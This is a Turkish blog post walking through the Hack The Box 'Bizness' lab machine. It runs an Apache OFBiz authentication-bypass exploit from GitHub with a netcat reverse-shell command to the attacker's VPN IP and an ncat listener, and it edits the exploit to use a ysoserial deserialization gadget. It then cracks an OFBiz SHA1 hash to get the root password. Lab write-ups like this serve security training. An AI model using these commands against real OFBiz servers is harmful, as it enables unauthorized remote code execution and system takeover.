Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Hackthebox Bizness Çözümü

Hackthebox Bizness Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 4 dk okuma süresi
373 0

Merhabalar bu yazımda Hackthebox Bizness Çözümü sizler için detaylı olarak anlattım. Keyifli çözümler diliyorum..

1- sudo nano /etc/hosts yazıyoruz ve gelen ekrana aşağıda ki gibi ip adresi ve alan adını ekleyerek makineyi ayarlıyoruz.

10.10.11.252 bizness.htb eklemiş olduk.

Hackthebox Bizness Çözümü

2- Port taraması yaptım ve 3 portun açık olduğunu tespit ettim. Portları ve versiyonlara göre araştırma yaptım ama bir açık bulamadım.

Hackthebox Bizness Çözümü

3- Nikto ile tarama yaptım ve yine net bir bilgi bulamadım. Artık direkt siteye giderek kaynak kodlardan araştırma yapabiliriz.

Gobuster ile de araştırma yaptım oradan da işimize yarar bir şey bulamadım.

Hackthebox Bizness Çözümü

4- Kaynak kodlarda bir şey bulamadım ama sayfanın alt kısmında Apache OFBiz olarak kullanıldığını görmüş olduk. Google üzerinden exploit araştırması yapmaya başlayalım.

5-  Sırasıyla;

  • git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
  • cd Apache-OFBiz-Authentication-Bypass
  • python3 exploit.py –url https://bizness.htb –cmd ‘nc -c bash vpnipadresiniz 9001’

6- ncat -lvnp 9001 olarak dinlemeyi de başlatalım.

İlginizi çekebilecek yazımız: Alman Polisi, Nemesis Market Darkweb Pazarını Kapattı

7- Çalıştırdığımızda Java kodlarında hata olduğu uyarısını aldık. Dosya içerisine girip exploit.py açıyoruz ve size vereceğim kodlar ile değiştirebilirsiniz.

nano ile de değiştirebilirsiniz ya da manuel de ekleyebilirsiniz. Ben manuel olarak el ile düzenleyeceğim.

8- Aşağıda ki kodu command= başlayan kod ile değiştiriyoruz.

command = “java -jar –add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED –add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED –add-opens java.base/java.net=ALL-UNNAMED –add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 ‘{args.cmd}'”

Tüm kodları buraya ekledim eğer exploit.py çalışmazsa link içerisindeki kodlar ile exploit.py içerisindekileri değiştirebilirsiniz.  

https://controlc.com/4b4f1533 

9-  5.maddeki adım ile exploit.py tekrar çalıştırdık ve direkt olarak bağlantımız ekrana geldi.

10- Templates içerisine geldim ve Adminuserlogindata.xml içerisine geldik ve En altta SHA1 tarzında özel kodlanmış bir şifreleme ile karşılaştık. Bunun daha detaylı görmek için log kayıtlarında araştırmaya devam ediyorum.

11- Admin içerisinde ki kayıtı buldum ve SHA1 benzer şifrenin açık halini tespit ettim.

ApacheOfBiz şifrelemesi kendine özel olduğu için sadece özel programlar ile kırabiliyoruz. Yani bu şifreleme türünü kırmak için direkt brute force yapmamız gerekiyor.

Hackthebox Bizness Çözümü

12-  Sırasıyla;

  • git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker.git
  • cd Apache-OFBiz-SHA1-Cracker
  • python3 OfBiz-crack.py –hash-string ‘Sha1 şifre’

girdik ve direkt olarak brute force saldırısını yaptı ve şifreyi decode ettik.

Root şifresi monkeybizness olarak tbulduk.

Hackthebox Bizness Çözümü

13- su root dedik ve monkeybizness  şifresini girerek root olduk.

Sırasıyla, cat /home/ofbiz/user.txt ve cat /root/root.txt direkt olarak root bayrağını da bulduk.

Hackthebox Bizness Çözümü yazımızın sonuna geldik, yeni yazılarda görüşmek üzere sağlıcakla kalın..

Hackthebox Bizness Çözümü

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir